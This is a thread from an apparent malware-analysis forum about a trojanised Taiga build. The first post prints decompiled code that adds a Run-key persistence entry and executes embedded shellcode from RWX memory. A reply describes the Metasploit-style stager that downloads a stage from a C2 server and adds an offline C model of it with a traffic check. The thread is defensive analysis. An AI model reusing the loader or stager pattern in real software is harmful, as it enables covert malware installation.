A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #30967  by EP_X0FF
 Sun Nov 05, 2017 3:09 am
Malware targeting viewers of Chinese porn cartoons. Modified version of Taiga (https://github.com/erengy/taiga/issues/489).

Masterpiece of code (F5 in IDA Pro)
```c
/* Hex-Rays output as posted, with comments added. unk_412780 is the
 * embedded blob the post describes as shellcode. */
  // Persistence. GetModuleFileNameW returns 0 on failure, never -1,
  // so this check can never fail.
  if ( GetModuleFileNameW(0, &Filename, 0x104u) != -1
    && !RegCreateKeyExW(
          HKEY_CURRENT_USER,
          L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
          0,
          0,
          0,
          0x20006u,        // KEY_WRITE
          0,
          &phkResult,
          0) )
  {
    // REG_SZ (1u) value "Java" = full path of this executable; size includes the terminating NUL
    RegSetValueExW(phkResult, L"Java", 0, 1u, (const BYTE *)&Filename, 2 * wcslen(&Filename) + 2);
  }
  // MEM_COMMIT (0x1000) + PAGE_EXECUTE_READWRITE (0x40): RWX buffer for the shellcode
  v4 = VirtualAlloc(0, 0x18Bu, 0x1000u, 0x40u);
  qmemcpy(v4, &unk_412780, 0x18Bu);   // copy the 0x18B-byte embedded shellcode
  ((void (*)(void))v4)();              // and jump into it
```
Attached: the modified Taiga and the downloader exe dropped by the above shellcode, which is also implemented through shellcode. I don't have the actual payload it downloads, but I also don't expect anything interesting from it (probably one of the retarded ransomwares, which is not interesting at all in any case).
Attachments (2.52 MiB)
pass: infected
 #30969  by sysopfb
 Sun Nov 05, 2017 8:49 pm
This has a pcap of it downloading a payload from when it was live. Kudos to any.run for reaching out to Bart on Twitter about the pcap.

https://app.any.run/tasks/010df394-dad9 ... 0892cde074

The decoded code from the embedded PE in the modified Taiga program looks like it was based on Metasploit's receive asm code, which just takes a dword value from the C2, then reads in that dword in size before RET-jumping to the new code it downloaded from the C2.

There is also a pcap from when it was live on hybrid-analysis, but the C2 didn't send anything, which makes the code exit.
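The receive-stager framing sysopfb describes above, as an added example that is not code from the sample, from the thread, or from Metasploit: the C2 sends one little-endian DWORD length, the stager reads exactly that many bytes into executable memory and transfers control to them. The network and the final jump are replaced here with an in-memory byte stream (type and function names such as `c2_stream`, `receive_stage` and `looks_like_stage_delivery` are my own), so the framing logic can be run offline; it exercises short reads, the C2-sends-nothing case that made the hybrid-analysis run exit, and adds a length sanity bound the real stager does not have. The last function is the analyst-side check you would apply to the C2-to-victim bytes of a capture such as the any.run pcap: does the first DWORD equal the length of everything that follows? The sample stream is constructed.

```c
/* Added example: portable model of a Metasploit-style receive stager.
 * Not the malware's code; recv()/VirtualAlloc()/RET are replaced by an
 * in-memory stream so the framing logic can be executed and checked. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simulated C2 connection. max_chunk caps what one "recv" returns so
 * that short reads, as a real socket produces, are exercised. */
typedef struct {
    const uint8_t *data;
    size_t len;
    size_t pos;
    size_t max_chunk;
} c2_stream;

/* Mimics recv(): bytes copied, or 0 when the peer has nothing more (closed). */
static size_t c2_recv(c2_stream *s, uint8_t *buf, size_t want)
{
    size_t avail = s->len - s->pos;
    size_t n = want < avail ? want : avail;
    if (n > s->max_chunk)
        n = s->max_chunk;
    memcpy(buf, s->data + s->pos, n);
    s->pos += n;
    return n;
}

/* Read exactly n bytes, looping over short reads; 0 if the C2 closed early. */
static int recv_exact(c2_stream *s, uint8_t *buf, size_t n)
{
    size_t got = 0;
    while (got < n) {
        size_t r = c2_recv(s, buf + got, n - got);
        if (r == 0)
            return 0;   /* nothing from the C2: the real stager exits here */
        got += r;
    }
    return 1;
}

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Stager logic: DWORD length, then the stage. Returns a malloc'd copy of
 * the stage and sets *out_len, or NULL if the C2 sent nothing or too little.
 * The real thing would VirtualAlloc(PAGE_EXECUTE_READWRITE) and RET into it. */
uint8_t *receive_stage(c2_stream *s, size_t *out_len, size_t max_stage)
{
    uint8_t hdr[4];
    if (!recv_exact(s, hdr, sizeof hdr))
        return NULL;
    uint32_t n = le32(hdr);
    if (n == 0 || (size_t)n > max_stage)   /* sanity bound the sample lacks */
        return NULL;
    uint8_t *stage = malloc(n);
    if (!stage)
        return NULL;
    if (!recv_exact(s, stage, n)) {        /* C2 closed mid-stage */
        free(stage);
        return NULL;
    }
    *out_len = n;
    return stage;
}

/* Analyst-side check on captured C2->victim bytes: length-prefixed stage delivery
 * looks like first LE DWORD == number of bytes that follow it. */
int looks_like_stage_delivery(const uint8_t *data, size_t len)
{
    if (len < 4)
        return 0;
    uint32_t n = le32(data);
    return n != 0 && (size_t)n == len - 4;
}

/* Constructed C2 response: length 5, then a 5-byte "stage" (nop sled + ret). */
static const uint8_t sample_c2[] = { 0x05, 0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0xC3 };

/* Run the stager over the first stream_len bytes of sample_c2 with the
 * given chunk size; returns the stage length, 0 when no stage was received. */
size_t run_sample(size_t stream_len, size_t max_chunk)
{
    c2_stream s = { sample_c2, stream_len, 0, max_chunk };
    size_t n = 0;
    uint8_t *stage = receive_stage(&s, &n, 1u << 20);
    if (!stage)
        return 0;
    free(stage);
    return n;
}

int main(void)
{
    printf("live C2, 3-byte reads: stage of %zu bytes\n", run_sample(sizeof sample_c2, 3));
    printf("silent C2: stage of %zu bytes (stager exits)\n", run_sample(0, 3));
    printf("capture looks like stage delivery: %d\n",
           looks_like_stage_delivery(sample_c2, sizeof sample_c2));
    return 0;
}
```

The bound in `receive_stage` is the one difference from the stager's behaviour worth noting: Metasploit's stub trusts the DWORD completely, so a captured stream where the first DWORD is wildly larger than what follows is either a truncated capture or not this framing at all.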